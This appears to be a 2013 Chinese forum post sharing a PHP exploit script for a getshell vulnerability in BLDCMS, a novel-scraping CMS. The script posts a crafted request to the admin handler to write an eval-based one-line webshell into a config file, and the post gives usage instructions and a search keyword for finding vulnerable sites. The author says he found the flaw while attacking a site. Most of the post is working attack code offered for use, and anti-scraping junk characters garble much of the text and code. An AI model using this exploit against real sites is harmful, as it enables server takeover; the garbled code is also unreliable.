之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞- N& Q3 l$ e9 p8 y4 J$ q8 g: z
: M& R5 v) N& d) k- Y/ d8 e- m) g
4 |- ^" ^. ~% y1 ]& H) j话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 7 N, d: d0 a( P& ?9 C2 C- M
& D& G% v% e! X3 B' r) m4 L0 _, q既然都有人发了 我就把我之前写好的EXP放出来吧
% Y" z* m$ Y2 h* K! ~4 J
- c4 K% S. s4 wview source print?01.php;">
7 p7 w: {) y: W, o: ]9 k02.<!--?php
; B$ {# r) m4 @0 |+ h! ~! i, V03.echo "-------------------------------------------------------------------" @' m/ A- p. r
04.
& J, h1 o* `5 Z- ]2 D' }05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
. e( w8 T) B; D& Q3 U# j06.
. h; R5 O, G" I* d( g) s07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun% E# `: G+ o& U
08.
. v/ p- t S( a+ M5 v( u$ V09.QQ:981009941\r\n 2013.3.21\r\n
9 h9 v! K" T& y& f( y/ i10.
: Y% o# P8 X% g2 X3 c1 [11.
1 z7 G6 [; s0 Q/ ]# {12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
2 n% b* R) @% u) G, _* l1 Y6 }' y' K13.
, |. `# O, Y! `& r4 @5 w14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------! {/ b# C* h6 m' F/ \1 B
15. / t' N, T X, V' d& q
16.--------------------------------------------------------------------\r\n";( ?+ r) `) K, d+ x2 x: w
17.$url=$argv[1];
. Q' _& b! q a9 W- p- x4 ]18.$dir=$argv[2];
' \, ?: \1 D9 S ]" S2 ]0 b19.$pass=$argv[3];
c8 e0 V, U `( S% B, H20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';6 o. c2 P2 ]$ V8 [
21.if (emptyempty($pass)||emptyempty($url))
0 q. L5 g' P% f ^& y" t# _, v22.{exit("请输入参数");}+ j. b5 l. x+ T2 N' h
23.else4 o5 a4 L' \0 ?- X8 E+ S! E& P
24.{
b: F, `* ?. z( ~ z% A6 F25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev$ c$ O+ X. F2 e. ^' h/ c
26.
* d1 A; ?+ w" G7 A5 b+ H3 b27.al;
" T" o% v `; ~% m( Y28.$length = strlen($fuckdata);1 L0 b( y) N: u
29.function getshell($url,$pass), T. D5 n9 o0 O5 I
30.{ @) O5 d4 @6 V2 u: ]! W
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
6 g4 X; }0 J$ I) @/ U0 S32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
4 J: i2 }0 @, O" m$ G" I/ @4 i33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
6 l# J$ b, Y; `/ i) b! u34.$header .= "User-Agent: MSIE\r\n";
: w% u) q! ?* p4 {1 B ?# { }35.$header .= "Host:".$url."\r\n";2 I Z2 v8 r) f0 @" o7 q9 F8 V
36.$header .= "Content-Length: ".$length."\r\n";9 {# [% @# ?" d, `% z7 [9 L
37.$header .= "Connection: Close\r\n";
- f h3 J; i, O/ j/ m38.$header .="\r\n";+ n& K2 R& x( Y) o+ N g A$ I
39.$header .= $fuckdata."\r\n\r\n";' }' m; [' R4 s8 z
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
6 l L8 k7 c* N% R5 T, F41.if (!$fp)% ~0 I; R' q9 a/ x: b# P& g. z
42.{* d6 t5 d, B, [
43.exit ("利用失败:请检查指定目标是否能正常打开");7 f! q+ Q8 `4 k
44.}' O9 y- ?# G' b' Z3 `" B
45.else{ if (!fputs($fp,$header))6 I2 _) p+ v; m. _. u+ b: e+ M
46.{exit ("利用失败");}# S" S# e M4 V) W0 s
47.else& P- ]2 {! n# K$ b2 ]* b
48.{
9 E$ l+ s& ^, o% A49.$receive = '';9 U/ W/ K3 O4 e
50.while (!feof($fp)) {' C0 W# z' `- x6 f. T7 ^# ~. }! n2 S
51.$receive .= @fgets($fp, 1000);
/ ^8 r1 x% r- `+ a+ E52.}9 e h* | [, g8 E; G
53.@fclose($fp);
; A5 u1 Q) f v( l, h4 k5 S M54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标& R8 P, K+ u! n; U6 }) [
55.
% e* U. U: {+ a& ?" s1 F6 C/ Z56.GPC是否=off)";8 z. e3 T k6 S+ R+ u7 j
57.}}0 `: Q4 P* `8 b/ K3 `
58.}
# U7 A3 G0 J; A# k' u% _* t8 V59.}$ o$ X: ]+ i' j3 {, r* m
60.getshell($url,$pass);% k3 A0 B/ I9 u) h* B! U! j
61.?-->
- @9 C# O' x2 ?
4 m& n3 o; l7 Q" T. x. K9 l; {2 `6 m0 k8 j; ~* X0 p4 g( Z
( }! K# J! {4 h" K! X% Q
by 数据流
9 Z1 k) Q' X w+ m |
发表于 2013-3-26 20:49:10
收藏
支持
反对